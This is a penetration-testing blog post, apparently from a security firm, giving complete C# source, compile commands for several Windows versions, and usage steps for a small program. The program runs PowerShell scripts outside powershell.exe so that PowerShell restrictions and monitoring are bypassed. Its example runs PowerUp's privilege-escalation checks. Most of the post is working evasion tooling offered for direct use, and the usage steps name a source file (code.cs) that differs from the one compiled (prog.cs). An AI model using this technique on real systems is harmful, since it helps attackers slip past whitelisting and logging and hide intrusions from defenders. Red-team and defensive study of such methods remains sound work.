PowerShell w/o PowerShell Simplified
In a previous post, titled PowerShell without PowerShell, we showed you how you can bypass Application Whitelisting Software (AWS), PowerShell restrictions/monitoring, and Command Prompt restrictions. In some cases, you might not need all of that; you might just need a way to bypass PowerShell restrictions and/or monitoring. This post presents a simple solution for the aforementioned scenario. This approach is not new but this post attempts to present it in a plain, straight-forward way.
The sections are as follows:
Code: The code needed for this solution
Compilation: The OS-Dependent commands to compile the code
Usage: Instructions on compilation, special configuration of PowerShell files, and execution of the program and PowerShell scripts.
Code (prog.cs):
//Usage: prog.exe "path_to_powershell_file" using System; using System.Configuration.Install; using System.Runtime.InteropServices; using System.Management.Automation.Runspaces; public class Program { public static void Main( string[] args ) { Mycode.Exec( args[ 0 ] ); } } public class Mycode { public static void Exec(string file) { string command = System.IO.File.ReadAllText( file ); RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create(); Runspace rspace = RunspaceFactory.CreateRunspace( rspacecfg ); rspace.Open(); Pipeline pipeline = rspace.CreatePipeline(); pipeline.Commands.AddScript( command ); pipeline.Invoke(); } }
Compilation:
Windows 7 x64
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 7 x86
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 10 x64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 10 x86
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Usage:
Create a file named C:\Users\Public\code.cs. Copy and paste the code from the Code Section above into the code.cs file.
Open a Windows Command Prompt and compile the program by copying and pasting the command above that is appropriate to your OS.
In the PowerShell script that you wish to run, place the function call that you would normally use to run the script at the bottom of the script. For instance, say that you wanted to run Invoke-AllChecks from PowerUp.ps1. I typically do the following:
Invoke-AllChecks -Verbose | Out-File C:\Users\Public\allchecks.txt
To do the same with this program, you would need to copy the command above and paste it at the bottom of the PowerUp.ps1 file.
Once you’ve placed your function call at the bottom of your target PowerShell script, run the program and script with the following command from the Windows Command Prompt:
C:\Users\Public\prog.exe C:\Users\Public\PowerUp.ps1
Note that you need to change C:\Users\Public\PowerUp.ps1 to be the name of the PowerShell script that you would like to run.
Conclusion:
This short and (hopefully) simple post presented a quick solution to executing PowerShell scripts in environments where PowerShell usage is restricted and/or is being monitored. This approach gives additional reasons for why companies should consider implementing stricter AWS policies in their environment.
Join us at Wild West Hackin’ Fest in Deadwood — September 23-25th, 2020. Learn more: https://www.wildwesthackinfest.com/
Ready to learn more?
Level up your skills with affordable classes from Antisyphon!
Available live/virtual and on-demand